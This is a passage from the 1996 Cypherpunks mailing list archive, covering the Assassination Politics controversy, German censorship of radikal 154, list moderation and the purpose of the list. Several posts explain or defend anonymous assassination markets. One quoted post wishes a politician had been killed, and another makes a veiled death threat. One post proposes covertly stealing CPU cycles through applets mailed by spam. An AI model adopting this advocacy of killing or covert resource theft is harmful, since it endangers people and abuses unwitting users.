> > This program stops people recovering the data. It wipes all the unused > disk area with random data. This technique provides "after the fact" > protection. Imagine putting all your old confidential documents in a > trash can. "Washer" shreds all the documents in the trash. > > Download your free copy from > http://www.compulink.co.uk/~net-services/wash/ > > Steve Harris - Net Services - Making E-Mail privacy easy > with PGP. http://www.compulink.co.uk/~net-services/pgp/ From gary at systemics.com Tue Sep 24 11:04:59 1996 From: gary at systemics.com (Gary Howland) Date: Wed, 25 Sep 1996 02:04:59 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: Message-ID: <3247E8DF.FF6D5DF@systemics.com> Timothy C. May wrote: > > At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote: > > >like Markof are somewhat more responsible. This is not going to stop me > >from producing an op-ed piece linking the net libertarians to assassination > >politics unless I hear a few more repudiations of Bell's ideas. If you > >don't very clearly reject his murderous ideas you are going to regret it > >just as the left regretted having the USSR or the RAF associated with them. > > I for one don't respond well to extortion threats, so write your damned article. Seconded. You know, the real problem with the average blackmailer is that they rarely give you the offer as a legal document - if we fulfil our side of the bargain, how can we be sure he fulfils his, and doesn't change his mind next time someone half agrees with a pro AP/Legal-blackmail/Tax-haven/Libertarian-state/freedom-of-speech/whatever post? We obviously need some sort of legal contract to solve this problem, but no, that's not possible in most countries, is it?. How convenient. Till next time Phill ... Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. 
pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From declan at eff.org Tue Sep 24 11:05:43 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 25 Sep 1996 02:05:43 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: <199609232122.OAA15542@atropos.c2.org> Message-ID: I agree with Sameer -- I don't think Germany wins. The information is still online. A quick Altavista search will take you to it. The mirror sites' continued existence forces Germany's hand; now they'll have to try and block the rest of the sites. -Declan On Mon, 23 Sep 1996 sameer at c2.net wrote: > > Unfortunately, this means that Germany wins. > > How does this mean that Germany wins? "radikal 154" is still > available all over the world, at almost 50 mirror sites, I believe > (including http://www.c2.net/radikal/), which are *not* blocked by > Germany. > > -- > Sameer Parekh Voice: 510-986-8770 > C2Net FAX: 510-986-8777 > The Internet Privacy Provider > http://www.c2.net/ sameer at c2.net > // declan at eff.org // I do not represent the EFF // declan at well.com // From pjb at ny.ubs.com Tue Sep 24 11:08:00 1996 From: pjb at ny.ubs.com (pjb at ny.ubs.com) Date: Wed, 25 Sep 1996 02:08:00 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: <199609241328.JAA12601@sherry.ny.ubs.com> i was under the impression that germany's goal was to stop the distribution of radikal 154 by xs4all, not by 50 mirror sites. they seem to have accomplished their goal. do you really think that they will let a little thing like reason stand in their way when claiming victory? -paul > From cypherpunks-errors at toad.com Tue Sep 24 06:43:51 1996 > From: sameer at c2.net > Subject: Re: We removed radikal 154 from xs4all :( > To: tcmay at got.net (Timothy C. 
May) > Date: Mon, 23 Sep 1996 14:22:40 -0700 (PDT) > Cc: tank at xs4all.nl, cypherpunks at toad.com > X-Mailer: ELM [version 2.4 PL24 ME8a] > Mime-Version: 1.0 > Content-Type: text/plain; charset=US-ASCII > Content-Transfer-Encoding: 7bit > Sender: owner-cypherpunks at toad.com > Content-Length: 397 > > > Unfortunately, this means that Germany wins. > > How does this mean that Germany wins? "radikal 154" is still > available all over the world, at almost 50 mirror sites, I believe > (including http://www.c2.net/radikal/), which are *not* blocked by > Germany. > > -- > Sameer Parekh Voice: 510-986-8770 > C2Net FAX: 510-986-8777 > The Internet Privacy Provider > http://www.c2.net/ sameer at c2.net > From m5 at tivoli.com Tue Sep 24 11:35:32 1996 From: m5 at tivoli.com (Mike McNally) Date: Wed, 25 Sep 1996 02:35:32 +0800 Subject: provably hard PK cryptosystems In-Reply-To: Message-ID: <3247ECCA.7743@tivoli.com> Gary Howland wrote: > writing a cycle stealing Internet java app... And remember, you can do that simply by putting your applet in an HTML document and then spam-mailing the document with appropriate MIME header information to zillions of people. Everybody who's reading mail with Netscape (and maybe IE) will see your little HTML document (which needn't be anything special), and your applet will be able to fire up and start stealing cycles. In fact, it'd be cool to set up a mail sender that would construct such a page automatically with each outgoing mail message. That way, ordinary postings to mailing lists would go out with that spiffy HTML look, and you'd get all those CPU cycles without angering the community (much). -- ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! 
From dthorn at gte.net Tue Sep 24 11:47:13 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 02:47:13 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <199609240135.SAA23298@mail.pacifier.com> Message-ID: <3247EF0D.6D1D@gte.net> jim bell wrote: > At 05:48 PM 9/23/96 -0400, hallam at vesuvius.ai.mit.edu wrote: > >So Jim Bell is opposed to "truly random attacks on ordinary citizens" > >It's this type of apologia for terrorism that disgusts me utterly. > >He is calling for murder but wants to dress it up in whatever > >psychotic justifications he can. > >He is also completely wrong. When the IRA attempted to assassinate my > >cousin I was in no way intimidated and neither was he. He continued > >as a senior politician for over a decade despite continued danger. I > >can think of no less effective method of bringing about change in > >attitudes. And he, along with others, failed to solve the problems as > >well. Is this progress? > >I am in no way intimidated by Bell either. He is a kook and I don't > >think he is worth further consideration. > For the record, if an AP-type system were to operate it would: > 1. Make it impossible for the British to continue to station troops > in Northern Ireland, an eventuality that I suppose Phill resists. > However, it would also: > 2. Make it impossible and unnecessary for the British to have any > troops anywhere, because it would eliminate its government and > military. It would no longer be a country, merely an island with > people living there. > 3. Make it unnecessary in Northern Ireland to protect the Catholics > from the Protestants, or the Protestants from the Catholics, because the > trouble-makers from both (all?) sides would be quickly erased from the > scene. Nobody would rule anybody. Nobody COULD rule anybody. All > factions would either be peaceful or dead, their choice. No political > advantage could be gained by violence, because all politics would have > ceased. > 4. 
Make it unnecessary and pointless for Northern Ireland to re-unify > with > Ireland, because likewise the government and military of Ireland would > dissolve, as well as all political structure in that land as well. > In short, the only reasons that the current problems are maintained in > Northern Ireland and Britain would be eliminated by the advent of AP. > So who is the "kook," really? Lessee if I have this right, now. We have basically three scenarios: 1. Allow the status quo to continue (the justice system scam now run by Janet Reno/Louis Freeh types et al.) 2. Allow the people some democracy in applying justice through AP. 3. Sometime in the future, build the Gort(?) robots, as in The Day The Earth Stood Still, and let them do the job. Whatcha think? From pgf at acadian.net Tue Sep 24 11:59:02 1996 From: pgf at acadian.net (Phil Fraering) Date: Wed, 25 Sep 1996 02:59:02 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <6XJquD10w165w@bwalk.dm.com> Message-ID: On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > There is no such thing as an "ordinary citizen". When the U.S. commits > war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere, > every American taxpayer is an accomplice and a fair game. Likewise, any > British subject is fair game for IRA's self-defense against centuries of > British genocide and oppression. Are you aware that from the _American_ point of view, we suffered from Russian war crimes in Korea and elsewhere? Where are the POW's that are missing from that war? > > It's a pity the IRA didn't nail your cousin. I wish them better luck next time. > If I were you I wouldn't advocate murder based on nationality; there are lots of swamps in this state that can decompose bodies completely in six months. Even the bones are gone. 
Phil Fraering pgf at acadian.net 318/261-9649 From Mullen.Patrick at mail.ndhm.gtegsc.com Tue Sep 24 12:08:21 1996 From: Mullen.Patrick at mail.ndhm.gtegsc.com (Mullen Patrick) Date: Wed, 25 Sep 1996 03:08:21 +0800 Subject: List participation (noise) Message-ID: I don't know why you guys rank on Tim May so much. Sure, he goes off topic sometimes. Hell, THIS MESSAGE IS OFF TOPIC AS IS THE MESSAGE I'M REPLYING TO! Get the point? Today, I had to delete more than 15 messages related to telling everyone how much of an asshole Tim is because he speaks off topic. Hello? Aren't these blatant (and I feel totally unwarranted) flames off topic? I think everyone should take a step back and look what's happening here. Everyone is so eager to point fingers, and they don't look at the fact that when you first get to your mail in the morning, there are over 100, even over 150 messages waiting for you! Of course, after deleting all of the noise (Thank God that damned TWA thread finally died!), you have maybe 50 messages you have to skim through, of which maybe 10 or 20 survive and go to the archive list of useful information. Maybe I should just stay out of it, but I feel these constant flamings of Tim are horribly wrong, and I've been ignoring the fact that I have to delete 20 messages about him every day for the past week. I actually find a lot of his postings interesting. Yes, half of his postings get the insta-delete-never-even-considered-for-reading treatment, but I just read an insightful message about "provably hard cryptosystems." Cryptosystems- Hm. Imagine that. Cryptosystems mentioned on a list called "Cypherpunks." ... And I thought it was the "Fuck the CIA, let's spread rumors about the US military shooting down commercial airliners out of New York, spam the spammers, kiddie-porn-on-the-net" discussion group... And now the disclaimer... Even with all of the noise, there is a lot of good information on this list, but my delete key is wearing out! 
:-) And please, if you don't have anything important to say, don't say anything. Posting noise does nothing but generate more noise (Hm... I wonder how much I've just generated! :-) Patrick _______________________________________________________________________________ From: Eric Hughes on Tue, Sep 24, 1996 6:38 Subject: List participation To: cypherpunks at TOAD.COM I have been informed that Dr.Dimitri Vulis KOTM wrote: > [...] Tim's off-topic spews have driven Eric Hughes, John Gilmore, > Rich Salz, and many other former valuable contributors off the > mailing list [...] As for me, I stopped having time to read cypherpunks a year and a half ago. Tim had nothing to do with it. The cypherpunks list has changed and I have changed; so be it. Eric From pgf at acadian.net Tue Sep 24 12:16:11 1996 From: pgf at acadian.net (Phil Fraering) Date: Wed, 25 Sep 1996 03:16:11 +0800 Subject: Public Schools In-Reply-To: Message-ID: On 
Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > U.S. public school system is darwinian evolution in action. Parents who can > afford to send their kids to private schools, do so. Parents who send their > kids to public schools deserve to have their offsprings fucked up, mentally > and physically, to improve the species' gene pool. But the cutoff is often whether the parents can afford to send their kids to private school, not whether or not they're genetically superior. And the reason it costs so much to send a kid to private school is that everyone's already paying for a more expensive public school thanks to all the taxes. > There are plenty of excellent private elementary and secondary schools in the > U.S. Children who deserve better schooling (by virtue of having parents who > have better genes and are therefore economically successful) get it. So if I'm economically successful it'll change my genes? I guess this is the famous Russian belief in Lamarckianism in action. Phil From dthorn at gte.net Tue Sep 24 12:18:52 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 03:18:52 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: Message-ID: <3247E9CF.568D@gte.net> Hamish wrote: > Soon I am going to be going overseas to Japan, and I want to take > my notebook with me so I can keep up with everything, however, I have > encrypted my hard drive and usually encrypt my mail. Is this in > violation of the ITAR to keep everything the same when I go over? Bad enough now that many places require you to put your laptop computer through the big gray x-ray machine (no exceptions in some places, especially federal buildings in the U.S.), but if they start requiring you to list individual files (?????). From mwohler at ix.netcom.com Tue Sep 24 12:24:32 1996 From: mwohler at ix.netcom.com (Marc J. 
Wohler) Date: Wed, 25 Sep 1996 03:24:32 +0800 Subject: Bork book Message-ID: <199609241525.IAA01531@dfw-ix10.ix.netcom.com> At 08:44 AM 9/24/96 -0500, you wrote: >Robert Bork was on NBC (I think) being interviewed to plug his hot >new book "Slouching Towards Gomorrah" (or something like that). > >Bork came across as kind-of a jerk, personality-wise. >-- Heard him on Limbaugh pushing hard for censorship as a cure for society's problems. Looks like Ted Kennedy & Co. were right to keep him off the court. Marc From attila at primenet.com Tue Sep 24 12:33:36 1996 From: attila at primenet.com (attila) Date: Wed, 25 Sep 1996 03:33:36 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] Message-ID: <199609241518.JAA08759@InfoWest.COM> At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote: >like Markof are somewhat more responsible. This is not going to stop me >from producing an op-ed piece linking the net libertarians to assassination >politics unless I hear a few more repudiations of Bell's ideas. If you >don't very clearly reject his murderous ideas you are going to regret it >just as the left regretted having the USSR or the RAF associated with them. hallam-baker: go back to your beloved England and your labour unions disguised as professional societies. stand on top of the ivory tower and enjoy the view --at least get the top of it out of your anal cavity. try leaving your closet, and smell the flowers. the british are behaving like wimps with their capitulation on privacy and any semblance of gun rights. I'll cast my vote with Tim May --talk in terms of extortion, and I'll tell you what you wish to hear: NO, I will not outright reject Jim Bell's "Assassination Politics." As Jefferson said: "God forbid we should ever be 20 years without such a rebellion. . . . What country can preserve its liberties if their rulers are not warned from time to time that their people preserve the spirit of resistance?. . 
.The tree of liberty must be refreshed from time to time with the blood of patriots and tyrants." also, piss off. we can defend american rights without a dawg- eared Brit liberal foaming at the mouth. as to regretting it --I doubt it. the second amendment was written with the idea of a populace who retains their personal rights and is not just another slave to the mafia/fascist form of government which the US has become. something a brit pansy _certainly_ would not understand: LIBERTY IS WORTH DYING FOR! -- one of the few things we all share: the utter, corrosive contempt for our elected officials. From sunder at brainlink.com Tue Sep 24 12:55:02 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Wed, 25 Sep 1996 03:55:02 +0800 Subject: Banning annoying users In-Reply-To: <199609241158.HAA27269@envirolink.org> Message-ID: On Tue, 24 Sep 1996, Daniel Miskell wrote: > The > not allowing unsubscribed individuals to post is logical, for a time. But > that basically outlaws anon remailers that don't allow you to send to an > account, and a lot of them don't, from my limited understanding. Besides, if > we set up the list to ban people who are 'undesirable', instead of just using > our own killfiles to do the dirty work for the list, then what is to stop > someone from banning you? Sure, you move on to another list, but, personally, > I wouldn't want it done to me, and so I would not do it to someone else. But, > like I said, personal killfiles are more than encouraged. It resolves these > kinds of conflicts a lot faster and cleaner than debating who and who should > not be banned. This is wonderful in theory -- and in practice up until now, but what happens when someone decides "Oh, I hate this list and Tim, let me write a spam bot to anonymously spam the this into oblivion?" There is such a thing as denial of service via spamming. It's quite easy to do for someone who knows how to run sendmail and knows how to write a shell script or a small program. 
Hell, I could write one of those in less than 1 minute. As for me being banned, I doubt it, I'm not posting daily Tim warnings and such spams. yeah, banning someone off the list for their political or even crypto views is silly. Banning someone for spamming is another issue. There is no reason we can't allow posts from those who are not subscribed to the list. There's also no reason that we can't have someone moderate those posts before they make it to the list to remove the spams - mind you not to moderate the contents, but to remove repeating annoying spam and advertisement. As for me, I don't personally give a shit, for as long as assholes like John Anonymous Mac keeps posting "Tim Warnings" I get more users on my filtered cypherpunks list. :) But it's getting really old. ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From sales at starnine.com Tue Sep 24 13:07:02 1996 From: sales at starnine.com (StarNine Sales Service) Date: Wed, 25 Sep 1996 04:07:02 +0800 Subject: Reminder on your eval software Message-ID: Dear Macintosh User, Thank you for your interest in our free evaluation software. We hope that you're enjoying working with one of our award-winning Macintosh server products such as WebSTAR, ListSTAR or Quarterdeck Mail. We're sending this message to you as a quick reminder that the serial key for your evaluation copy will expire in approximately three weeks. 
If for any reason you were unable to successfully download the requested file, we urge you to try downloading again at: . Once you've begun using our software, you should enjoy easy installation and administration. If you experience any difficulties, please consult one of our useful on-line support resources such as our FAQ pages or technical notes at . Of course, you can always receive a personal reply to your questions by sending e-mail to support at starnine.com. After you've had a chance to evaluate whether the program meets the needs of your organization, we urge you to call our sales office at 1-800-525-2580 or (510) 649-4949, or send mail to sales at starnine.com for information regarding pricing and availability. Products may also be purchased via our on-line store: You may want to evaluate one of our other products we offer: * WebSTAR - for easily creating and maintaining dynamic Web sites on your Macintosh. WebSTAR recently won "Software Product of the Year" and "Editor's Choice" award, and now includes Adobe Pagemill for easy Web page creation. * ListSTAR - allowing you to publish email on the Internet. Create your own powerful email discussion groups and Email-On-Demand services, including easy Web site integration. * Quarterdeck Mail (formerly Microsoft Mail for AppleTalk Networks). The easiest client-server email system for Mac networks, now includes one-click browser URL-launching, internet-style signatures and more! * Mail*Link Gateways - connect Quarterdeck Mail or QuickMail to the Internet or Unix systems via the UUCP or SMTP protocols. Please call (800) 525-2580 or mail sales at starnine.com for evaluation copies. Thank you again for your interest in our products. Sincerely, StarNine Technologies, a Quarterdeck Company -------------------------------------------- Phone: 1-800-525-2580 FAX: (510)-548-0393 2550 Ninth Street, Suite 112 Berkeley, CA 94110 From moe-san at stadt.com Tue Sep 24 13:11:18 1996 From: moe-san at stadt.com (D. 
Moeller) Date: Wed, 25 Sep 1996 04:11:18 +0800 Subject: Where to write crypto? In-Reply-To: <3.0b19.32.19960923075911.00bd74d4@panix.com> Message-ID: <3248059E.1974@stadt.com> Duncan Frissell wrote: > > One does not need a work permit to travel around Europe staying in various > places and writing crypto. Correct, inside EU. > Work permits only apply to residents. One does need a work-permit in Switzerland, since Switzerland is not EU and everybody from an outside country needs one. Cheers Moe! From richieb at teleport.com Tue Sep 24 13:14:45 1996 From: richieb at teleport.com (Rich Burroughs) Date: Wed, 25 Sep 1996 04:14:45 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <3.0b24.32.19960924064658.006b3540@mail.teleport.com> At 08:33 PM 9/23/96 -0700, tcmay at got.net (Timothy C. May) wrote: >At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote: > >>like Markof are somewhat more responsible. This is not going to stop me >>from producing an op-ed piece linking the net libertarians to assassination >>politics unless I hear a few more repudiations of Bell's ideas. If you >>don't very clearly reject his murderous ideas you are going to regret it >>just as the left regretted having the USSR or the RAF associated with them. > >I for one don't respond well to extortion threats, so write your damned article. Anyone who mistakes the lack of "repudiations" for AP on the list for some kind of tacit approval is not getting the whole picture, IMHO. Is this how journalists do their research nowadays -- "give me some info or I'll write something really bad about you that you'll regret?" Cool. I guess I thought there might still be some kind of pursuit of the truth involved. I personally don't have the time or energy to contribute to the AP threads. That != approval for the idea. I hope you include your above quote in your piece. 
Rich ______________________________________________________________________ Rich Burroughs richieb at teleport.com http://www.teleport.com/~richieb See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon U.S. State Censorship Page at - http://www.teleport.com/~richieb/state New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause From talon57 at well.com Tue Sep 24 13:16:47 1996 From: talon57 at well.com (Brian D Williams) Date: Wed, 25 Sep 1996 04:16:47 +0800 Subject: AP [was kiddie porn on the net] [noise] Message-ID: <199609241613.JAA20109@well.com> Phill states: > I do support the presence of troops in Northern Ireland and >do not consider that to contradict my belief that there should be >a united, autonomous Ireland. I do not believe that the >"loyalists" are in fact loyal to the British way of life, any more >than the KKK are representative of the US south. Do as you like. Regrettably as long as there are British troops in Ireland, Britain will continue to encounter the occasional "Irish Cruise Missile." As several people have already pointed out, the solution is obvious. Brian From s1113645 at tesla.cc.uottawa.ca Tue Sep 24 14:48:51 1996 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Wed, 25 Sep 1996 05:48:51 +0800 Subject: LACC: Re: Australia now has information police In-Reply-To: <199609220643.QAA13076@suburbia.net> Message-ID: On Sun, 22 Sep 1996, Julian Assange wrote: > [re COCOM trade agreements] > > All COCOM countries most likely. That said Australia does not seem to be Didn't the COCOM treaty expire? 
From bryce at digicash.com Tue Sep 24 15:12:10 1996 From: bryce at digicash.com (bryce at digicash.com) Date: Wed, 25 Sep 1996 06:12:10 +0800 Subject: (non-)repudiation, AP, Hallam and me Message-ID: <199609241720.TAA08077@digicash.com> -----BEGIN PGP SIGNED MESSAGE----- I don't have the time or interest to read and write about Bell's evil kook daydreams or Baker's contorted statist rationalizations. Feel free to write any misrepresentations about me (in general or in specific) that you like. I'm sure in the long run it will do more harm to you than to me. For what it is worth, I long ago warned that cpunks needed to distance themselves from Bell in the public's eye. Nowadays I don't really care what the public thinks of cpunks. Regards, Bryce -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2 iQB1AwUBMkgYVEjbHy8sKZitAQHbpwL/XQfN72HBoOBmqodwD2WaAD4DBY6CP1zm VphitY08frCZcz/okbVlQx8Jzs68rDzkJAeGbYdeumYc5vixwkv0q0QCLTvluu+I t8fTfIuraSzZS2gUlE9BMkNirEK+z5jA =gnG0 -----END PGP SIGNATURE----- From whgiii at amaranth.com Tue Sep 24 15:20:22 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Wed, 25 Sep 1996 06:20:22 +0800 Subject: Public Schools In-Reply-To: Message-ID: <199609241652.LAA22261@mailhub.amaranth.com> In , on 09/23/96 at 11:00 AM, Dan Harmon said: > >One of the hardest things that we have to work hardest to counter-act >with our twins, who attend PS, is the socialization they >pick up at school. There is an easy solution to that problem, it's called home school. :) -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. 
Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- From blancw at microsoft.com Tue Sep 24 15:22:07 1996 From: blancw at microsoft.com (Blanc Weber) Date: Wed, 25 Sep 1996 06:22:07 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: From: hallam at vesuvius.ai.mit.edu If you don't very clearly reject his murderous ideas you are going to regret it just as the left regretted having the USSR or the RAF associated with them. ........................................................................ ........... They wouldn't have to be repudiated in public. They could be repudiated in private, and he would never know what hit'im. There's so much hypocrisy in the world, anyway, with groups not doing what they say or not saying what they really do, how can anyone believe what any group claims to believe in unless and until they engage in some kind of action. You might as well spend your time believing John Anonymous MacDonald. It's best to be prepared to defend yourself against anyone, regardless of what virtuous conduct they claim to believe in. .. Blanc > > > > From cbarnett at eciad.bc.ca Tue Sep 24 15:32:59 1996 From: cbarnett at eciad.bc.ca (Clint Barnett) Date: Wed, 25 Sep 1996 06:32:59 +0800 Subject: crypto anarchy vs AP In-Reply-To: <3.0b19.32.19960923225428.00b29a50@panix.com> Message-ID: exactly my point. clint barnett emily carr institute On Mon, 23 Sep 1996, Duncan Frissell wrote: > At 11:26 AM 9/23/96 -0700, Clint Barnett wrote: > > >ever read "1984"? the appearance of a free lifestyle is most definitely > >not a free lifestyle. I am hardly a friend of the state, and far from > >being an advocate of the church, but multinational corporations running > >the world for their own fun and profit makes my sphincter clench. > > The lifestyle in "1984" didn't appear free. 
Someone who thinks that an > institution like the government that gains all its revenue by force and is > armed with nukes is less dangerous than institutions that are shrinking in > size and gain most of their revenue by voluntary exchange is nuts. > > DCF > From jf_avon at citenet.net Tue Sep 24 15:36:56 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Wed, 25 Sep 1996 06:36:56 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: <9609241723.AB00771@cti02.citenet.net> > At 05:48 PM 9/23/96 -0400, hallam at vesuvius.ai.mit.edu wrote: > >When the IRA attempted to assassinate my cousin I was in no > >way intimidated and neither was he. He continued as a senior > >politician for over a decade despite continued danger. I can think > >of no less effective method of bringing about change in attitudes. I don't think you truly understood the *mechanism* of AP. Your cousin was threatened from an outside attack. Protection is relatively easy in that case. AP generates a threat * within * every * part * of every structure (family, work, friends, etc). As an analogy, when a specialized demolishing team blows a building down, they don't use one big charge, they use hundreds of them to sever every load bearing member of the structure. AP would work the same, turning every person a potential motiveless assassin. I say "motiveless" because AP makes the motive not traceable to peoples or assets. Some AP assassins will get caught, but it is predictable that it will only be a minority and that with time, the percentage of caught assassins will get smaller as more professional assassins get seriously into the business. JFA Please reply by e-mail as I am no longer on Cypherpunks. 
Thanks Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Finest Limoges porcelain and crystal JFA Technologies, R&D consultant physicists and engineers, LabView programming PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From tcmay at got.net Tue Sep 24 15:48:21 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 25 Sep 1996 06:48:21 +0800 Subject: The Nature of the Cypherpunks List Message-ID: (Note: This started out as a comment on why I've been mostly silent during this latest of several efforts to disrupt the list, but I segued into a discussion of what this list talks about, and why, and why it can never be all things to all people. Pardon the length, but these are things I feel the need to say. Astute readers who've been on the list for several years will know that I've written a few other essays like this, usually about one per year. I suppose I should try to find my older essays and repost them, but I rarely repost old articles anymore....) THE LATEST ATTEMPT TO DISRUPT THE LIST I've been keeping my mouth shut lately on this whole Vulis--spam--Timmy--etc. thing, figuring that the one thing Vulis really wants to see is the list distracted by endless back-and-forth about whether "Timmy" really does the things Vulis and his "tentacles" claim, whether the list should be closed to non-subscribers, and on and on. But there comes a point where I need to speak up. (By the way, somebody even sent me a bizarre message, saying: "I am not quite sure why you have not shot back at Dr Virmin and his cause. Maybe that is the best way? Or are you guilty as charged?" So, to some, my silence means I might be guilty. Jeesh.) LET'S NOT BLOCK NONSUBSCRIBERS! A few comments on one of the recent messages: At 3:51 PM 9/24/96, Ray Arachelian wrote: >There is no reason we can't allow posts from those who are not subscribed >to the list. 
There's also no reason that we can't have someone moderate >those posts before they make it to the list to remove the spams - mind >you not to moderate the contents, but to remove repeating annoying spam >and advertisement. Blocking posts from non-subscribers would of course block all anonymous posts, something I don't think the Cypherpunks would be setting a good precedent in doing! Not only are most (all?) of the existing remailers essentially "our technology," but we believe (as an emergent consensus) that anonymous and pseudonymous speech is a Good Thing. "Cypherpunks block anonymous posts" would not be a good message to send, especially in these perilous times. (Sure, there are some workarounds. Stable nyms could be subscribed, as Black Unicorn and Lucky Green demonstrate. And nyms through nymservers. But not trivially, to add additional "allowed subscribers" without also sending them copies of messages.) MODERATION CONSIDERED HARMFUL As to moderation, let's nuke this idea right now. I know of no moderated list, except perhaps "RISKS," that's an improvement over unmoderated, open versions. (And RISKS is the personal project of Peter Neumann, who puts incredible effort into keeping it on track...I know of no person on our list who could or would do the same job, though I suspect some would jump at the chance to volunteer to do so, then probably let things fizzle out....) ... NO DEFENSE NEEDED On defending _me_ against the charges of Vulis and (one has to presume) his anonymous "Timmy warnings," don't bother. Please, don't bother. I don't need testimonials from others or votes of support. It just adds to the noise. If Vulis is ignored, he'll likely eventually go away, as some other well-known net.personalities have done. (Vulis claims we "drove away" Rich Salz, John Gilmore, Eric Hughes, etc. But do we then get credit for "driving away" Dr. Fred C. Cohen, Dr. David Sternlight, and Lawrence Detweiler? Fair is fair, after all. 
Not that I think the decisions people make to remain on mailing lists or in discussions, or in marriages for that matter, are usually the fault of others.) THE NATURE OF THE CYPHERPUNKS LIST Look, this list now has something like 1400 subscribers, according to something someone posted a few weeks ago. (I suspect at least a few hundred of those names are merely passive reflectors. And I certainly only "see" a few hundred names appearing here as posters, and only a few dozen as _active voices_ in debates. So I tend to view the list as being a few hundred moderately active readers, with the other thousand or so as nonsubscribers, effectively.) With hundreds of active readers, all sorts of things will get said. Some bizarre, some insulting, some insightful, some tangential, etc. Some of them are not liked by Vulis, some not liked by Perry Metzger, some not liked by me. And as Eric Hughes noted, the list changes, and we change. Certainly the topics of today cannot be the same fresh, new topics of four years ago, when many of the basics were being discussed for the first time. Perforce, the list talks about things of current interest---the security measures in the wake of TWA 800 are a perfectly good, list-related topic. This is just one example, of many. While some folks would rather we talked only about "crypto," just how many times can basic questions about Diffie-Hellman, or RSA, or elliptic curves be discussed? At some point these issues become esoteric research topics, and are unlikely to be casually discussed on a mailing list such as ours. (And many of the ostensibly on-topic pure crypto questions are actually just banal questions about topics covered in any crypto textbooks! Which is not surprising, actually.) 
THE RAISON D'ETRE FOR CYPHERPUNKS

And as I was there at the initial planning meeting in July of '92, and then at the first physical meeting, I can assure you that what soon became "Cypherpunks" was never intended to be an announcement list for research discoveries in mathematical cryptography!

Much as some have been shrilly claiming "This list is for crypto and programming discussions only," this was *never* the intent. And, judging from the topics people have brought up over the past four years, the constituency for _only_ talking about mathematical cryptography and programming issues appears to be rather small.

Nothing is stopping those who call for discussing only crypto and programming to do exactly that: discuss only crypto and programming.

The serious crypto researchers, e.g., the Matt Blazes, the Whit Diffies, and the Carl Ellisons of the world, have various channels they use to communicate in. Conferences several times a year, limited mailing lists, other channels, etc. That they have all been members of the Cypherpunks list but are not any longer is their choice. There are lots of reasons people make the decision they can't cope with another mailing list, or that filtering it is taking too long, etc.

For one thing, in the past few years the explosion of the Web and increased interest in things cryptographic has made it more difficult to find time for any of the channels of communication to be followed. And, as I noted, some of the discussions which were "fresh" a few years ago no longer are.

This last point is not something any forum can do much about. Just as there are certain ecological truths about "large, hungry predators are never numerous," so, too, are there basic information-theoretic truths about the decline in freshness of topics: "not everything remains fresh and new forever."
REAPING THE HARVEST

When the Cypherpunks group and list got started, we reaped the harvest of work done from the mid-70s to the early 90s, with basic encryption (1976), secret-sharing (1980), digital mixes (1981), digital cash (1985), and various other abstract results ready to be *combined* with the parallel development of the Net, e-mail, Perl, and the Bay Area hacker community (from whom Eric and I drew for the organization of our first gathering...the response was tremendous).

We felt there was a golden opportunity to take some of the academic research in the cryptographic community and "deploy" it on the Net. Deploy it in furtherance of various stated and unstated political and social beliefs we had.

